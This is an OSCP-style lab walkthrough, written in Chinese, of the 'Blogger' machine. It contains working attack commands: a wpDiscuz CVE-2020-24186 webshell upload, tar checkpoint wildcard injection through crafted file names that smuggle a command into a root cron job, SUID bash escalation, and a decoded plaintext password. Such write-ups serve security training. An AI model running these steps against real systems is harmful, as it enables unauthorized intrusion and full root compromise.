OSCP - Other Machines - Blogger

首先nmap起手,虽然ssh版本比较老，但是它不能提供更多有价值的线索了，注意力放在80端口

Nmap scan report for 192.168.177.217
Host is up (0.42s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 95:1d:82:8f:5e:de:9a:00:a8:07:39:bd:ac:ad:d3:44 (RSA)
|   256 d7:b4:52:a2:c8:fa:b7:0e:d1:a8:d0:70:cd:6b:36:90 (ECDSA)
|_  256 df:f2:4f:77:33:44:d5:93:d7:79:17:45:5a:a1:36:8b (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Blogger | Home
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)

80端口看起来也没有什么东西，但是路径爆破发现了一些路径，需要挨个看一下

# Dirsearch started Wed Feb  5 08:26:27 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.132.217 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

301   319B   http://192.168.132.217/images    -> REDIRECTS TO: http://192.168.132.217/images/
301   319B   http://192.168.132.217/assets    -> REDIRECTS TO: http://192.168.132.217/assets/
301   316B   http://192.168.132.217/css    -> REDIRECTS TO: http://192.168.132.217/css/
301   315B   http://192.168.132.217/js    -> REDIRECTS TO: http://192.168.132.217/js/
403   280B   http://192.168.132.217/server-status

居然在assets/fonts路径下发现了一个blog目录，不过需要先把blogger.pg添加到/etc/hosts文件中才能正常访问，不过可以看出是一个wordpress实例

用wpscan扫描一下发现wpdiscuz插件有文件上传漏洞

搜搜一下exp,发现了https://github.com/hev0x/CVE-2020-24186-wpDiscuz-7.0.4-RCE，可以实现reverse shell

C:\home\kali\Documents\OFFSEC\play\Blogger\CVE-2020-24186-wpDiscuz-7.0.4-RCE-main> sudo python wpDiscuz_RemoteCodeExec.py -u http://blogger.pg/assets/fonts/blog -p ?p=29    
---------------------------------------------------------------
[-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution
[-] File Upload Bypass Vulnerability - PHP Webshell Upload
[-] CVE: CVE-2020-24186
[-] https://github.com/hevox
--------------------------------------------------------------- 

[+] Response length:[59354] | code:[200]
[!] Got wmuSecurity value: e8f3a1bf79
[!] Got wmuSecurity value: 29 

[+] Generating random name for Webshell...
[!] Generated webshell name: wlitvttntqthjma

[!] Trying to Upload Webshell..
[+] Upload Success... Webshell path:http://blogger.pg/assets/fonts/blog/wp-content/uploads/2025/02/wlitvttntqthjma-1738722269.2139.php 

> id


uid=33(www-data) gid=33(www-data) groups=33(www-data)
▒

其实也可以手动修改php-reverse-shell.php，在post下面作为图片上传来实现reverse shell，要注意添加 GIF689a;字样

当reverse shell创建成功后，上传linpeas.sh与pspy64并运行

在pspy64的结果中发现了 /usr/local/bin/backup.sh被root用户以cronjob的形式运行，并且它会利用tar命令备份/home/james/路径下的 local.txt,不过目前我们没有james的密码

pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
......
......
2025/02/05 01:10:01 CMD: UID=0    PID=20223  | /bin/sh /usr/local/bin/backup.sh 
2025/02/05 01:10:01 CMD: UID=0    PID=20222  | /bin/sh -c /usr/local/bin/backup.sh 
2025/02/05 01:10:01 CMD: UID=0    PID=20224  | tar czf /tmp/backup.tar.gz local.txt 

不过在linpeas.sh的结果中发现了 .creds文件，内容为: ';u22>'v$)='2a#B&>`c'=+C(?5(|)q**bAv2=+E5s'+|u&I'vDI(uAt&=+(|`yx')Av#>'v%?}:#=+)';y@%'5(2vA!'<y$&u"H!"ll

╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 root root 104 Jan 17  2021 /opt/.creds

看起来像是加密或者编码过的，在CyberChef中可以利用rot47+base64来解码，得到了james用户的密码

利用得到的密码来转变成james来在/home/james路径下创建文件来实现提权，思路是利用创建checkpoint文件 来让tar命令执行的时候调用相关script

www-data@ubuntu-xenial:/opt$ su james
su james
Password: S3cr37_P@$$W0rd

james@ubuntu-xenial:/opt$ cd /home/james
james@ubuntu-xenial:~$ id
id
uid=1002(james) gid=1002(james) groups=1002(james)

james@ubuntu-xenial:~$  echo "chmod +s /bin/bash" >shell.sh\
 echo "chmod +s /bin/bash" >shell.sh\
> 

james@ubuntu-xenial:~$ ls -lart
ls -lart
total 28
drwxr-xr-x 5 root  root  4096 Jan 17  2021 ..
-rw-r--r-- 1 james james  655 Jan 17  2021 .profile
-rw-r--r-- 1 james james 3771 Jan 17  2021 .bashrc
-rw-r--r-- 1 james james  220 Jan 17  2021 .bash_logout
-rw-r--r-- 1 root  root    33 Feb  5 00:08 local.txt
-rw-rw-r-- 1 james james   19 Feb  5 02:02 shell.sh
drwxr-xr-x 2 james james 4096 Feb  5 02:02 .
james@ubuntu-xenial:~$ cat shell.sh
cat shell.sh
chmod +s /bin/bash
james@ubuntu-xenial:~$  chmod +x shell.sh
 chmod +x shell.sh
james@ubuntu-xenial:~$  touch -- "--checkpoint-action=exec=sh shell.sh"
 touch -- "--checkpoint-action=exec=sh shell.sh"
james@ubuntu-xenial:~$ touch -- "--checkpoint=1"
touch -- "--checkpoint=1"
james@ubuntu-xenial:~$ ls -lart
ls -lart
total 28
drwxr-xr-x 5 root  root  4096 Jan 17  2021 ..
-rw-r--r-- 1 james james  655 Jan 17  2021 .profile
-rw-r--r-- 1 james james 3771 Jan 17  2021 .bashrc
-rw-r--r-- 1 james james  220 Jan 17  2021 .bash_logout
-rw-r--r-- 1 root  root    33 Feb  5 00:08 local.txt
-rwxrwxr-x 1 james james   19 Feb  5 02:02 shell.sh
-rw-rw-r-- 1 james james    0 Feb  5 02:03 --checkpoint-action=exec=sh shell.sh
-rw-rw-r-- 1 james james    0 Feb  5 02:03 --checkpoint=1
drwxr-xr-x 2 james james 4096 Feb  5 02:03 .

稍等一会儿提权成功

james@ubuntu-xenial:~$ ls -l /bin/bash
ls -l /bin/bash
-rwxr-xr-x 1 root root 1037528 Jul 12  2019 /bin/bash
james@ubuntu-xenial:~$ ^[[A
ls -l /bin/bash
-rwsr-sr-x 1 root root 1037528 Jul 12  2019 /bin/bash
james@ubuntu-xenial:~$ /bin/bash -p
/bin/bash -p
bash-4.3# cat /root/proof.txt
cat /root/proof.txt
13618d6242920b9f53a9623217760e49